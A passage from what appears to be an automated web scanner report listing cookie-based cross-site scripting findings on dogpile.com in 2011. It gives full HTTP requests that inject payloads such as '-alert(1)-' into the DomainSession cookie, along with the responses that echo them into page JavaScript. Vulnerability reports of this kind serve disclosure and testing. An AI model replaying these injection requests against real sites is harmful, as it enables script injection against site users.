Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=576fec2bf7284bfebe21c16a3af0cb01&ActionId=2b6d828d4bd64cce96eac16a3af0cb01&CookieDomain=.dogpile.com8f72c"-alert(1)-"f359c353bfe; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:55 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:55 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:55 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=576fec2bf7284bfebe21c16a3af0cb01&ActionId=2b6d828d4bd64cce96eac16a3af0cb01&CookieDomain=.dogpile.com8f72c"-alert(1)-"f359c353bfe; expires=Fri, 01 Apr 2011 17:34:55 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.136. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91bc"-alert(1)-"8a6ce0e863e was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:43 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=576fec2bf7284bfebe21c16a3af0cb01&ActionId=57e9f6a7a2d64328b77bc16a3af0cb01&CookieDomain=.dogpile.comd91bc"-alert(1)-"8a6ce0e863e

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=57e9f6a7a2d64328b77bc16a3af0cb01&ActionId=a3af644f37f54f13b92dc16a3af0cb01&CookieDomain=.dogpile.comd91bc"-alert(1)-"8a6ce0e863e; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:54 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:54 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:53 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 32540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=57e9f6a7a2d64328b77bc16a3af0cb01&ActionId=a3af644f37f54f13b92dc16a3af0cb01&CookieDomain=.dogpile.comd91bc"-alert(1)-"8a6ce0e863e; expires=Fri, 01 Apr 2011 17:34:54 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.137. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24062"-alert(1)-"3197989eac9 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=e0a2585a54c44613a05fc16a3af0cb01&ActionId=cbef8ee057aa45668e6fc16a3af0cb01&CookieDomain=.dogpile.com24062"-alert(1)-"3197989eac9

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 17:14:46 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=cbef8ee057aa45668e6fc16a3af0cb01&ActionId=69e4663f27db43c59583c16a3af0cb01&CookieDomain=.dogpile.com24062"-alert(1)-"3197989eac9; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:46 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:46 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:46 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 51063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=cbef8ee057aa45668e6fc16a3af0cb01&ActionId=69e4663f27db43c59583c16a3af0cb01&CookieDomain=.dogpile.com24062"-alert(1)-"3197989eac9; expires=Fri, 01 Apr 2011 17:34:46 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.138. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 868e6"-alert(1)-"815bb4494be was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
Content-Length: 2186
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com868e6"-alert(1)-"815bb4494be

__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY2x1ZGUFLmljZV
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=60447a2b02554a509018c16a3af0cb01&CookieDomain=.dogpile.com868e6"-alert(1)-"815bb4494be; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:01 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:01 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:01 GMT; path=/
Set-Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301677098680; path=/
Set-Cookie: wsRecent=site%3axss.cx,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:01 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 65245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=60447a2b02554a509018c16a3af0cb01&CookieDomain=.dogpile.com868e6"-alert(1)-"815bb4494be; expires=Fri, 01 Apr 2011 17:18:01 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.139. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17e70"-alert(1)-"8009d3e9d2 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:13 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=afded22df52249fea4b3c16a3af0cb01&ActionId=03e0e226b781481fa972c16a3af0cb01&CookieDomain=.dogpile.com17e70"-alert(1)-"8009d3e9d2

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=03e0e226b781481fa972c16a3af0cb01&ActionId=d011953374bb4c588ac4c16a3af0cb01&CookieDomain=.dogpile.com17e70"-alert(1)-"8009d3e9d2; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:42 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:42 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:41 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=03e0e226b781481fa972c16a3af0cb01&ActionId=d011953374bb4c588ac4c16a3af0cb01&CookieDomain=.dogpile.com17e70"-alert(1)-"8009d3e9d2; expires=Fri, 01 Apr 2011 17:35:42 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.140. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5784a"-alert(1)-"4be09a1635c was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:52 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301678093005; wsRecent=site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=8a9366cfe41848d795bec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=c1a8f04152fd49d4bbd5c16a3af0cb01&ActionId=afded22df52249fea4b3c16a3af0cb01&CookieDomain=.dogpile.com5784a"-alert(1)-"4be09a1635c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=8a9366cfe41848d795bec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=afded22df52249fea4b3c16a3af0cb01&ActionId=088007e032a74715904bc16a3af0cb01&CookieDomain=.dogpile.com5784a"-alert(1)-"4be09a1635c; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:34 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:34 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:34 GMT; path=/
Set-Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301678152859; path=/
Set-Cookie: wsRecent=Review+Sites,Web,Relevance,&Submit+Site,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:34 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 159313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=8a9366cfe41848d795bec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=afded22df52249fea4b3c16a3af0cb01&ActionId=088007e032a74715904bc16a3af0cb01&CookieDomain=.dogpile.com5784a"-alert(1)-"4be09a1635c; expires=Fri, 01 Apr 2011 17:35:34 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.141. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35970"-alert(1)-"f277aa05b72 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:16 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com35970"-alert(1)-"f277aa05b72

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f99d27d203c74389a638c16a3af0cb01&ActionId=99bbb00780eb47fda590c16a3af0cb01&CookieDomain=.dogpile.com35970"-alert(1)-"f277aa05b72; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:31 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:31 GMT; path=/
Set-Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301678144640; path=/
Set-Cookie: wsRecent=Submit+Site,Web,Relevance,&Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:31 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 159334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f99d27d203c74389a638c16a3af0cb01&ActionId=99bbb00780eb47fda590c16a3af0cb01&CookieDomain=.dogpile.com35970"-alert(1)-"f277aa05b72; expires=Fri, 01 Apr 2011 17:35:31 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.142. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7 [DomainSession cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93152"-alert(1)-"816df919a4f was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
